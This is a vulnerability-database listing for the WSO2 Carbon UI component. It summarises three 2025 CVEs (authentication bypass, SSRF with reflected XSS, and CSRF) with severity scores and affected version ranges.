Wso2 Org.Wso2.Carbon Org.Wso2.Carbon.Ui vulnerabilities
3 known vulnerabilities affecting wso2/org.wso2.carbon_org.wso2.carbon.ui.
Total CVEs
3
CISA KEV
0
Public exploits
2
Exploited in wild
1
Severity breakdown
HIGH1MEDIUM2
Vulnerabilities
Page 1 of 1
CVE-2025-5605P1MEDIUMCVSS 5.3ExploitedPoC≥ 4.5.3, < 4.5.3.40≥ 4.6.0, < 4.6.0.1224+12 more2025-10-24
CVE-2025-5605 [MEDIUM] CWE-290 CVE-2025-5605: An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A
An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure.
The known exposure from this issue is limited to memory statistics
nvd
CVE-2025-5350P4MEDIUMCVSS 4.8PoC≥ 4.5.3, < 4.5.3.41≥ 4.6.0, < 4.6.0.1087+12 more2025-10-24
CVE-2025-5350 [MEDIUM] CWE-79 CVE-2025-5350: SSRF and Reflected XSS Vulnerabilities exist in multiple WSO2 products within the deprecated Try-It
SSRF and Reflected XSS Vulnerabilities exist in multiple WSO2 products within the deprecated Try-It feature, which was accessible only to administrative users. This feature accepted user-supplied URLs without proper validation, leading to server-side request forgery (SSRF). Additionally, the retrieved content was directly reflected in the HTTP response,
nvd
CVE-2025-6670P3HIGHCVSS 8.8≥ 4.5.3, < 4.5.3.50≥ 4.6.0, < 4.6.0.2253+14 more2025-11-18
CVE-2025-6670 [HIGH] CWE-352 CVE-2025-6670: A Cross-Site Request Forgery (CSRF) vulnerability exists in multiple WSO2 products due to the use of
A Cross-Site Request Forgery (CSRF) vulnerability exists in multiple WSO2 products due to the use of the HTTP GET method for state-changing operations within admin services, specifically in the event processor of the Carbon console. Although the SameSite=Lax cookie attribute is used as a mitigation, it is ineffective in this context because it allows co
nvd